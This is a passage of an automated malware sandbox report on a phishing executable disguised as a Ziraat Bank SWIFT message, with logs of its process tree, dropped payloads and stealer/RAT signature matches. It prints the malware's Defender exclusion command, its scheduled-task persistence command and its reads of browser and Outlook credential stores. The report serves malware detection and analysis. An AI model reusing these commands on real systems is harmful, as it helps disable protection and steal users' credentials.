Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:50 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\cyclop\directiveness.exe "C:\Users\user\AppData\Local\cyclop\directiveness.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\directiveness.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

0_2_000DA66C

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000E71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_000E71FA

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe, directiveness.exe	Binary or memory string: Shell_TrayWnd
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe, directiveness.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000C65C4 cpuid

0_2_000C65C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

3_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server01.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000F091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_000F091D

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_0011B340 GetUserNameW,

0_2_0011B340

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000D1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_000D1E8E

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000BDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000BDDC0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.3f355c0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.server01.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f65610.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f4d5f0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f65610.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server01.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 3.2.RegSvcs.exe.2a11f56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2a11f56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2cb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2cb0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2a12e3e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ee0190.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ea6458.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ea5570.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2a12e3e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2d40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2cb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ea6458.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2d40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ea5570.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ee0190.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1367554523.0000000002D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1367391345.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1368343181.0000000003EA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1365681539.00000000029D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.3f355c0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.server01.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f65610.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f4d5f0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f65610.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server01.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\server01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\server01.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: directiveness.exe	Binary or memory string: WIN_81
Source: directiveness.exe	Binary or memory string: WIN_XP
Source: directiveness.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: directiveness.exe	Binary or memory string: WIN_XPe
Source: directiveness.exe	Binary or memory string: WIN_VISTA
Source: directiveness.exe	Binary or memory string: WIN_7
Source: directiveness.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 3.2.RegSvcs.exe.3f355c0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.server01.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f65610.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f4d5f0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f65610.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2592996086.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server01.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.3f355c0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.server01.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f65610.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f4d5f0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f65610.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server01.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 3.2.RegSvcs.exe.2a11f56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2a11f56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2cb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2cb0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2a12e3e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ee0190.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ea6458.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ea5570.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2a12e3e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2d40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2cb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ea6458.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2d40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ea5570.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3ee0190.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1367554523.0000000002D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1367391345.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1368343181.0000000003EA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1365681539.00000000029D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.3f355c0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.server01.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f65610.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f4d5f0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3f65610.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server01.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000F8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_000F8C4F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000F923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_000F923B
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00648C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	2_2_00648C4F
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0064923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_0064923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
